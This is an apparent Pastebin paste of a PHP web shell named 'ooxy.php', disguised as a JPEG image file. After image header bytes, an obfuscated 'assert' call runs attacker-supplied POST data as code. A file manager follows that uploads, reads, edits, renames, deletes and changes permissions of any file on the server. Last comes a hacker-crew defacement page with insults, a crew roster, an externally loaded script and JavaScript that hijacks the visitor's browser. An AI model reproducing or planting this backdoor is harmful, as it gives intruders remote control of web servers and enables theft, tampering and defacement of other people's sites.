Advertisement
PalmaSolutions

ooxy.php

Mar 10th, 2019
289
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.10 KB | None | 0 0
  1. ?? JFIF  ` ` ? C 
  2. 
  3.  
  4. 
  5.   ? C  
  6.  
  7. ?  N j" ?   
  8. ? ?  } !1AQa"q2亼?#B绷R佯$3br?
  9. %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz儎厗噲墛挀敃枟槞殺¥ウЖ┆渤吹斗腹郝媚牌侨墒矣哉肿刭卺忏溴骁栝犟蝮趱鲼??   
  10. ? ?  w !1AQaq"2?B憽绷 #3R?br?$4??&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz們剠唶垑姃摂晼棙櫄ⅲぅΗī炒刀犯购旅呐魄壬室釉罩棕仝忏溴骁栝牝篝貊鼬?   ? 齋( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( (<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['admins']);?>
  11. <?php
  12. set_time_limit(0);
  13. error_reporting(0);
  14.  
  15. if(get_magic_quotes_gpc()){
  16. foreach($_POST as $key=>$value){
  17. $_POST[$key] = stripslashes($value);
  18. }
  19. }
  20. echo '<html><head>
  21. <link rel="SHORTCUT ICON" href="http://goenk.wapgem.com/idb.png">
  22. <body>
  23. <style type="text/css">
  24. body {
  25. background: black;
  26. color: #00FF00;
  27. font-family: monospace;
  28. }
  29.  
  30. .accessGranted {
  31. position: absolute;
  32. top: 200px;
  33. background: #333;
  34. padding: 20px;
  35. border: 1px solid #999;
  36. width: 300px;
  37. left: 50%;
  38. margin-left: -150px;
  39. text-align: center;
  40. }
  41.  
  42. .accessDenied {
  43. position: absolute;
  44. top: 200px;
  45. color: #F00;
  46. background: #511;
  47. padding: 20px;
  48. border: 1px solid #F00;
  49. width: 300px;
  50. left: 50%;
  51. margin-left: -150px;
  52. text-align: center;
  53. }
  54. #content-center {
  55. width: 400px;
  56. padding: 0px 10px 10px 10px;
  57. width: 800px;
  58. margin: 0 auto;
  59. }
  60. #content-left {
  61. margin: 0 auto;
  62. text-align: left;
  63. }
  64. #content-right {
  65. margin: 0 auto;
  66. text-align: right;
  67. }
  68. input,select,textarea{
  69. border:0;
  70. border:1px solid #900;
  71. background:black;
  72. margin:0;
  73. color: white;
  74.  
  75. padding:2px 4px;
  76. }
  77. input:hover,textarea:hover,select:hover{
  78. background:black;
  79. color: blue;
  80.  
  81. border:1px solid #f00;
  82. }
  83. a{ text-decoration:none; color:red;}
  84. </style>
  85. </head>
  86. <H1><center></center></H1>
  87. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  88. <tr><td>Path : ';
  89. if(isset($_GET['path'])){
  90. $path = $_GET['path'];
  91. }else{
  92. $path = getcwd();
  93. }
  94. $path = str_replace('\\','/',$path);
  95. $paths = explode('/',$path);
  96.  
  97. foreach($paths as $id=>$pat){
  98. if($pat == '' && $id == 0){
  99. $a = true;
  100. echo '<a href="?path=/">/</a>';
  101. continue;
  102. }
  103. if($pat == '') continue;
  104. echo '<a href="?path=';
  105. for($i=0;$i<=$id;$i++){
  106. echo "$paths[$i]";
  107. if($i != $id) echo "/";
  108. }
  109. echo '">'.$pat.'</a>/';
  110. }
  111. echo '</td></tr><tr><td>';
  112. if(isset($_FILES['file'])){
  113. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  114. echo '<font color="green">OK COK SUKSESS !!</font><br />';
  115. }else{
  116. echo '<font color="red">ASU RAIMU ELK :P</font><br />';
  117. }
  118. }
  119. echo '<form enctype="multipart/form-data" method="POST">
  120. Upload File : <input type="file" name="file" />
  121. <input type="submit" value="upload" />
  122. </form>
  123. </td></tr>';
  124. if(isset($_GET['filesrc'])){
  125. echo "<tr><td>Current File : ";
  126. echo $_GET['filesrc'];
  127. echo '</tr></td></table><br />';
  128. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  129. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  130. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  131. if($_POST['opt'] == 'chmod'){
  132. if(isset($_POST['perm'])){
  133. if(chmod($_POST['path'],$_POST['perm'])){
  134. echo '<font color="green">Change Permission Done.</font><br />';
  135. }else{
  136. echo '<font color="red">Change Permission Error.</font><br />';
  137. }
  138. }
  139. echo '<form method="POST">
  140. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  141. <input type="hidden" name="path" value="'.$_POST['path'].'">
  142. <input type="hidden" name="opt" value="chmod">
  143. <input type="submit" value="Go" />
  144. </form>';
  145. }elseif($_POST['opt'] == 'rename'){
  146. if(isset($_POST['newname'])){
  147. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  148. echo '<font color="green">Change Name Done.</font><br />';
  149. }else{
  150. echo '<font color="red">Change Name Error.</font><br />';
  151. }
  152. $_POST['name'] = $_POST['newname'];
  153. }
  154. echo '<form method="POST">
  155. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  156. <input type="hidden" name="path" value="'.$_POST['path'].'">
  157. <input type="hidden" name="opt" value="rename">
  158. <input type="submit" value="Go" />
  159. </form>';
  160. }elseif($_POST['opt'] == 'edit'){
  161. if(isset($_POST['src'])){
  162. $fp = fopen($_POST['path'],'w');
  163. if(fwrite($fp,$_POST['src'])){
  164. echo '<font color="green">Edit File Done.</font><br />';
  165. }else{
  166. echo '<font color="red">Edit File Error.</font><br />';
  167. }
  168. fclose($fp);
  169. }
  170. echo '<form method="POST">
  171. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  172. <input type="hidden" name="path" value="'.$_POST['path'].'">
  173. <input type="hidden" name="opt" value="edit">
  174. <input type="submit" value="Go" />
  175. </form>';
  176. }
  177. echo '</center>';
  178. }else{
  179. echo '</table><br /><center>';
  180. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  181. if($_POST['type'] == 'dir'){
  182. if(rmdir($_POST['path'])){
  183. echo '<font color="green">Delete Dir Done.</font><br />';
  184. }else{
  185. echo '<font color="red">Delete Dir Error.</font><br />';
  186. }
  187. }elseif($_POST['type'] == 'file'){
  188. if(unlink($_POST['path'])){
  189. echo '<font color="green">Delete File Done.</font><br />';
  190. }else{
  191. echo '<font color="red">Delete File Error.</font><br />';
  192. }
  193. }
  194. }
  195. echo '</center>';
  196. $scandir = scandir($path);
  197. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  198. <tr class="first">
  199. <td><center>Name</center></td>
  200. <td><center>Size</center></td>
  201. <td><center>Permissions</center></td>
  202. <td><center>Options</center></td>
  203. </tr>';
  204.  
  205. foreach($scandir as $dir){
  206. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  207. echo "<tr>
  208. <td><a href=\"?path=$path/$dir\">$dir</a></td>
  209. <td><center>--</center></td>
  210. <td><center>";
  211. if(is_writable("$path/$dir")) echo '<font color="green">';
  212. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  213. echo perms("$path/$dir");
  214. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  215.  
  216. echo "</center></td>
  217. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  218. <select name=\"opt\">
  219. <option value=\"\"></option>
  220. <option value=\"delete\">Delete</option>
  221. <option value=\"chmod\">Chmod</option>
  222. <option value=\"rename\">Rename</option>
  223. </select>
  224. <input type=\"hidden\" name=\"type\" value=\"dir\">
  225. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  226. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  227. <input type=\"submit\" value=\">\" />
  228. </form></center></td>
  229. </tr>";
  230. }
  231. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  232. foreach($scandir as $file){
  233. if(!is_file("$path/$file")) continue;
  234. $size = filesize("$path/$file")/1024;
  235. $size = round($size,3);
  236. if($size >= 1024){
  237. $size = round($size/1024,2).' MB';
  238. }else{
  239. $size = $size.' KB';
  240. }
  241.  
  242. echo "<tr>
  243. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  244. <td><center>".$size."</center></td>
  245. <td><center>";
  246. if(is_writable("$path/$file")) echo '<font color="green">';
  247. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  248. echo perms("$path/$file");
  249. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  250. echo "</center></td>
  251. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  252. <select name=\"opt\">
  253. <option value=\"\"></option>
  254. <option value=\"delete\">Delete</option>
  255. <option value=\"chmod\">Chmod</option>
  256. <option value=\"rename\">Rename</option>
  257. <option value=\"edit\">Edit</option>
  258. </select>
  259. <input type=\"hidden\" name=\"type\" value=\"file\">
  260. <input type=\"hidden\" name=\"name\" value=\"$file\">
  261. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  262. <input type=\"submit\" value=\">\" />
  263. </form></center></td>
  264. </tr>";
  265. }
  266. echo '</table>
  267. </div>';
  268. }
  269. echo '
  270. </BODY>
  271. </HTML>';
  272. function perms($file){
  273. $perms = fileperms($file);
  274.  
  275. if (($perms & 0xC000) == 0xC000) {
  276. // Socket
  277. $info = 's';
  278. } elseif (($perms & 0xA000) == 0xA000) {
  279. // Symbolic Link
  280. $info = 'l';
  281. } elseif (($perms & 0x8000) == 0x8000) {
  282. // Regular
  283. $info = '-';
  284. } elseif (($perms & 0x6000) == 0x6000) {
  285. // Block special
  286. $info = 'b';
  287. } elseif (($perms & 0x4000) == 0x4000) {
  288. // Directory
  289. $info = 'd';
  290. } elseif (($perms & 0x2000) == 0x2000) {
  291. // Character special
  292. $info = 'c';
  293. } elseif (($perms & 0x1000) == 0x1000) {
  294. // FIFO pipe
  295. $info = 'p';
  296. } else {
  297. // Unknown
  298. $info = 'u';
  299. }
  300.  
  301. // Owner
  302. $info .= (($perms & 0x0100) ? 'r' : '-');
  303. $info .= (($perms & 0x0080) ? 'w' : '-');
  304. $info .= (($perms & 0x0040) ?
  305. (($perms & 0x0800) ? 's' : 'x' ) :
  306. (($perms & 0x0800) ? 'S' : '-'));
  307.  
  308. // Group
  309. $info .= (($perms & 0x0020) ? 'r' : '-');
  310. $info .= (($perms & 0x0010) ? 'w' : '-');
  311. $info .= (($perms & 0x0008) ?
  312. (($perms & 0x0400) ? 's' : 'x' ) :
  313. (($perms & 0x0400) ? 'S' : '-'));
  314.  
  315. // World
  316. $info .= (($perms & 0x0004) ? 'r' : '-');
  317. $info .= (($perms & 0x0002) ? 'w' : '-');
  318. $info .= (($perms & 0x0001) ?
  319. (($perms & 0x0200) ? 't' : 'x' ) :
  320. (($perms & 0x0200) ? 'T' : '-'));
  321.  
  322. return $info;
  323. }
  324. $htcs = "
  325. <html>
  326. <head>
  327. <title>Cardiman Asooooh !</title><link href='http://kefiex.yu.tl/files/bnx.png' rel='shortcut icon'/>
  328. <meta content='IDBTE4M' name='description'/>
  329. <meta content='IDBTE4M' name='keywords'/>
  330. <meta content='IDBTE4M' name='Abstract'/>
  331. <meta name='title' content='kefiex404'>
  332.  
  333. <link href='http://fonts.googleapis.com/css?family=Iceland:400,700' rel='stylesheet' type='text/css'>
  334. <link href='http://fonts.googleapis.com/css?family=Verdana:400,700' rel='stylesheet' type='text/css'>
  335. <link href='http://fonts.googleapis.com/css?family=Rockwell Condensed:400,700' rel='stylesheet' type='text/css'>
  336. <link href='http://fonts.googleapis.com/css?family=Courier New:400,700' rel='stylesheet' type='text/css'>
  337. <head>
  338. <html>
  339. <center><embed src='https://www.youtube.com/v/8-HC3iUXw34?rel=0&amp;autoplay=1&image=http://3.bp.blogspot.com/-RkTUcTZVXTY/UKgyroYk_xI/AAAAAAAAAF8/gUR3-QONm44/s1600/Untitled.png&repeat=always&autostart=true&frontcolor=cccccc&lightcolor=428cdb&backcolor=111111' width='1' height='1 allowscriptaccess='always'></embed></center>
  340. <script language='JavaScript'>
  341. function tb5_makeArray(n){
  342. this.length = n;
  343. return this.length;
  344. }
  345.  
  346. tb5_messages = new tb5_makeArray(1);
  347. tb5_messages[0] = 'Cardiman Asoooooooooh :v';
  348. tb5_rptType = 'infinite';
  349. tb5_rptNbr = 10;
  350. tb5_speed = 50;
  351. tb5_delay = 2000;
  352. var tb5_counter=1;
  353. var tb5_currMsg=0;
  354. var tb5_stsmsg='';
  355. function tb5_shuffle(arr){
  356. var k;
  357. for (i=0; i<arr.length; i++){
  358. k = Math.round(Math.random() * (arr.length - i - 1)) + i;
  359. temp = arr[i];arr[i]=arr[k];arr[k]=temp;
  360. }
  361. return arr;
  362. }
  363. tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
  364. tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
  365. for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){
  366. tb5_arr[i] = i;
  367. tb5_sts[i] = '_';
  368. }
  369. tb5_arr = tb5_shuffle(tb5_arr);
  370. function tb5_init(n){
  371. var k;
  372. if (n == tb5_arr.length){
  373. if (tb5_currMsg == tb5_messages.length-1){
  374. if ((tb5_rptType == 'finite') && (tb5_counter==tb5_rptNbr)){
  375. clearTimeout(tb5_timerID);
  376. return;
  377. }
  378. tb5_counter++;
  379. tb5_currMsg=0;
  380. }
  381. else{
  382. tb5_currMsg++;
  383. }
  384. n=0;
  385. tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
  386. tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
  387. for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){
  388. tb5_arr[i] = i;
  389. tb5_sts[i] = '_';
  390. }
  391. tb5_arr = tb5_shuffle(tb5_arr);
  392. tb5_sp=tb5_delay;
  393. }
  394. else{
  395. tb5_sp=tb5_speed;
  396. k = tb5_arr[n];
  397. tb5_sts[k] = tb5_messages[tb5_currMsg].charAt(k);
  398. tb5_stsmsg = '';
  399. for (var i=0; i<tb5_sts.length; i++)
  400. tb5_stsmsg += tb5_sts[i];
  401. document.title = tb5_stsmsg;
  402. n++;
  403. }
  404. tb5_timerID = setTimeout('tb5_init('+n+')', tb5_sp);
  405. }
  406. function tb5_randomizetitle(){
  407. tb5_init(0);
  408. }
  409. tb5_randomizetitle();
  410.  
  411. </script>
  412. <body bgcolor='black'>
  413. <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
  414. <meta name='google-site-verification' content='#Save Promagh'/>
  415. <meta name='google-site-verification' content='#Save Promagh'/>
  416. <meta name='google-site-verification' content='#Save Promagh'/>
  417. <meta name='google-site-verification' content='#Save Promagh'/>
  418. <meta http-equiv='Content-Language' content='en-us-id'>
  419. <meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1' />
  420. <meta http-equiv='Content-Type' content='text/html; charset=windows-1252'>
  421. <Meta http-equiv='content-type' content='text/html; charset=windows-1254'>
  422. <Meta http-equiv='content-type' content='text/html; charset=ISO-8859-9'>
  423. <meta name='author' content='#Save Promagh'>
  424. <meta name='copyright' content='#Save Promagh'/>
  425. <meta name='description' content='#Save Promagh'>
  426. <meta name='robots schedule' content='auto'>
  427. <link href='http://fonts.googleapis.com/css?family=Abel:700' rel='stylesheet' type='text/css'>
  428. <link href='http://fonts.googleapis.com/css?family=Abel:400' rel='stylesheet' type='text/css'>
  429. <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
  430. <link href='http://fonts.googleapis.com/css?family=Wallpoet' rel='stylesheet' type='text/css'>
  431. <link href='http://fonts.googleapis.com/css?family=Creepster' rel='stylesheet' type='text/css'>
  432.  
  433. <script type='text/javascript'> var SPklikkanan = 'TILANG';</script> <script type='text/javascript' src='https://googledrive.com/host/0B6KVua7D2SLCNDN2RW1ORmhZRWs/sp_tilang.js'></script>
  434. <script type='text/javascript'> if (typeof document.onselectstart!='undefined') { document.onselectstart=new Function ('return false'); } else{ document.onmousedown=new Function ('return false'); document.onmouseup=new Function ('return true'); } </SCRIPT>
  435.  
  436. <br><br><br> <center> <a rel='dofollow' href='https://www.google.co.id/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=indonesian+Hacker+rulez'> <img src='https://scontent-sin1-1.xx.fbcdn.net/hphotos-xal1/v/t1.0-9/12376796_565593456950242_7474357900886665426_n.jpg?oh=1db7c5d4e3fa5b7bc7b422a648b5decb&oe=574CE85B' style='opacity:0.4;filter:alpha(opacity=40)' onmouseover='this.style.opacity=1;this.filters.alpha.opacity=100' onmouseout='this.style.opacity=0.4;this.filters.alpha.opacity=40' height='360' width='670'><br></a> </center>
  437. <br> <center> <font face='iceland' size='10' color='red'> -=[ TEMAN ??? YAKIN LU TEMEN GUA ??? ]=-</font> </center>
  438. <br> <center> <font face='iceland' size='10' color='silver'> #Save Promagh</font> </center>
  439. </center>
  440. <b><font color='blue' face='consolas' size='4'>
  441. <p align='center' class='style2'><font face='Trajan Pro' size='4' color='Green' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='yellow'>
  442. -=[[ MY FAMILY ]]=-<br>-| ./KEFIEX404 | MANIAK KASUR | MR.K | EL-RO | ./COCO | TUAN GALAU | DEDEMIT ID | NO SCRIPT 404 |- <br> -| K3C0T | SIM0D | LITLE H4XORZ | Antonio HsH |-</font><p>
  443. <center><table width='100%' border='2'><tr><td width='10%' align='center'><blink><font Class-'glow' color='white'><code>MY FRIENDS : </code></font></blink></td><td width='90%'><font color='yellow' size='4'><marquee><code>
  444. [.] X-Wu7z [.] Tuan_galau [.] GrenXPaRTa [.] x'1n73ct [.] m@db100d [.] Hacker Sakit Hati [.] ./$amndan404 [.] ./wi.na [.] Neneng Juhairiah[ .] Mr_Oxygen [.] ./coco [.] H3ri.ID [.] Ice Cream [.] newbie patah hati [.] Naughty_r00tz [.] DarkWireless [.] ./czw_07 [.] ./TanpaNama404 [.] xCut10n [.] Kucing Galau [.] ./anjirGBX [.] Dicky Injector [.] jepry_vuln [.] Shut_Down404 [.] Mr.404_NotFound [.] Mr.LittleHaxor [.] Mr.Ghostteror_404 [.] Mr.Dork [.] Mr.aji.192 [.] L4W_CyberDKSH404.Not_Found [.] ozlok [.] Bloc_Anon/404 [.] R3DD3V1L [.] mr.cookie_302 [.]</code></marquee></font></td></tr></table><html><center>
  445.  
  446. <script>
  447. function muter2(){
  448. scrW=screen.availWidth
  449. scrH=screen.availHeight
  450. window.moveTo(0,0)
  451. window.resizeTo(10,10)
  452. window.focus()
  453. for(x=0;x<80;x++){
  454. window.resizeTo(10,scrH*x/80)
  455. }
  456. for(y=0;y<80;y++){
  457. window.resizeTo(scrW*y/80,scrH)
  458. }
  459. window.resizeTo(scrW,scrH)
  460. }
  461. document.oncontextmenu=new Function('muter2();return false');
  462. function keypressed(){alert('halah ....
  463.  
  464. mbuh ya kok yo podo micek ??/
  465.  
  466. padahal dee dewe yo meneng meneng ngecard :v
  467.  
  468. oalah asoooooooooooh :v ');}
  469. document.onkeydown=keypressed;
  470. function kasih_tau(){
  471. alert('matamu picek :v/
  472. jancok torok empek asooooooh :v
  473. opo ??? ra trimo ???
  474.  
  475. tokno kabeh skillmu :v ....
  476. jancok :v
  477.  
  478. ');
  479. }
  480. </script>
  481. </body>
  482. </html>
  483. ";
  484. $f =@fopen ('','w');
  485. fwrite($f , $htcs);
  486. $pg = basename(__FILE__);
  487.  
  488. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement